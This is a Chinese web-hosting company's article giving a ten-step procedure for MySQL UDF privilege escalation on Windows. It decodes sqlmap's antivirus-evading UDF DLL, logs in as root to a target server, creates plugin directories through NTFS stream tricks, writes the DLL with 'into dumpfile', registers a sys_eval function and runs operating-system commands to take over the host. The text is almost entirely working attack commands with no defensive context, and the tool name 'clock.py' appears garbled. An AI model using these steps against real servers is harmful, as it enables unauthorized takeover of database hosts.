MySQL中UDF提权获取主机控制权的详细步骤-创新互联

本文主要给大家介绍MySQL中UDF提权获取主机控制权的详细步骤,文章内容都是笔者用心摘选和编辑的,具有一定的针对性,对大家的参考意义还是比较大的,下面跟笔者一起了解下MySQL中UDF提权获取主机控制权的详细步骤吧。

创新互联建站专注于企业全网营销推广、网站重做改版、哈密网站定制设计、自适应品牌网站建设、H5网站设计商城网站制作、集团公司官网建设、外贸网站制作、高端网站制作、响应式网页设计等建站业务,价格优惠性价比高,为哈密等各大城市提供网站开发制作服务。

1、python clock.py -d -i lib_mysqludfsys.dll

此步是获取***用的UDF dll。首先要安装sqlmap,然后运行上述命令即可得到解码之后的UDF dll。(sqlmap对其进行编码是为了免杀)

2、mysql -h target_ip -uroot -p

与目标MySQL建立连接

3、select version();

查看MySQL版本

4、select @@basedir;

查看MySQL的安装目录。假设为 c:\program files\mysql\mysql server 5.1

5、select @@plugin_dir;

查看MySQL的插件目录。假设为c:\program files\mysql\mysql server 5.1\plugin

6、select 'it is dll' into dumpfile 'c:\program files\mysql\mysql server 5.1\lib::$INDEX_ALLOCATION';

创建lib目录

7、select  'it is dll' into dumpfile 'c:\program files\mysql\mysql server 5.1\plugin::$INDEX_ALLOCATION';

创建plugin目录

8、select unhex('hex_of_udf.dll') into dumpfile "c:\program files\mysql\mysql server 5.1\plugin\udf.dll";

创建udf.dll,上述命令中hex_of_udf.dll是udf.dll的十六进制文本,可用winhex等编辑软件获得

9、create function sys_eval returns string soname 'udf.dll';

创建函数

10、select sys_eval('whoami');
执行shell命令,表明以获取操作系统的控制权

看完以上关于MySQL中UDF提权获取主机控制权的详细步骤,很多读者朋友肯定多少有一定的了解,如需获取更多的行业知识信息 ,可以持续关注我们的行业资讯栏目的。

另外有需要云服务器可以了解下创新互联scvps.cn,海内外云服务器15元起步,三天无理由+7*72小时售后在线,公司持有idc许可证,提供“云服务器、裸金属服务器、高防服务器、香港服务器、美国服务器、虚拟主机、免备案服务器”等云主机租用服务以及企业上云的综合解决方案,具有“安全稳定、简单易用、服务可用性高、性价比高”等特点与优势,专为企业上云打造定制,能够满足用户丰富、多元化的应用场景需求。


标题名称:MySQL中UDF提权获取主机控制权的详细步骤-创新互联
网站网址:http://azwzsj.com/article/dosjhh.html